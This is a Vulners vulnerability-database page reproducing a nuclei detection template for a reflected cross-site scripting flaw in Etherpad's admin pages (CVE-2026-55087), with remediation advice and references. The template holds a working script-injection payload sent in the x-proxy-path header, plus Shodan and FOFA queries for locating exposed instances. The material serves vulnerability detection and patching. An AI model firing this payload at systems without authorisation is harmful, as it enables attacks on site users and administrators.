Lucene search
+L

Etherpad 2.1.0 <= 3.0.0 - Cross-Site Scripting

🗓️ 19 Aug 2026 14:11:17Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

Etherpad 2.1.0 to 3.0.0 reflects x-proxy-path header into admin pages enabling XSS.

Related
Refs
Code
id: CVE-2026-55087

info:
  name: Etherpad 2.1.0 <= 3.0.0 - Cross-Site Scripting
  author: Haseeb-1698
  severity: medium
  description: |
    Etherpad versions 2.1.0 through 3.0.0 reflect the x-proxy-path request header into admin HTML, JavaScript, and CSS responses without sanitization. An attacker can abuse this behavior to inject crafted content into generated resource URLs, enabling cross-site scripting and cache poisoning scenarios.
  remediation: |
    Upgrade to Etherpad 3.1.0 or later.
  reference:
    - https://github.com/ether/etherpad/security/advisories/GHSA-fjgc-3mj7-8rg8
    - https://github.com/ether/etherpad/commit/8c6104c5d5daf41f0d454acc04d42dffa0e0d996
    - https://nvd.nist.gov/vuln/detail/CVE-2026-55087
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-55087
    cwe-id: CWE-79,CWE-444,CWE-601
  metadata:
    verified: true
    max-request: 1
    vendor: ether
    product: etherpad
    shodan-query: http.title:"Etherpad"
    fofa-query: title="Etherpad"
  tags: cve,cve2026,etherpad,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/"

    headers:
      x-proxy-path: '/"><script>alert(document.domain)</script>'

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'src=\"/\\\"><script>alert(document.domain)</script>/admin/', 'href=\"/\\\"><script>alert(document.domain)</script>/admin/')"
          - "contains(header, 'text/html')"
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100e4b94e9d71895ee75bb7d43d7050fa172a16b0379a276d137a92e8e62cfec44b02200e69b2b83712c9d8c079ce8a21c62e0ad4af5d6bec0d08f87fad3ec2c7cb6279:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Aug 2026 01:19Current
5Medium risk
Vulners AI Score5
CVSS 3.16.1
3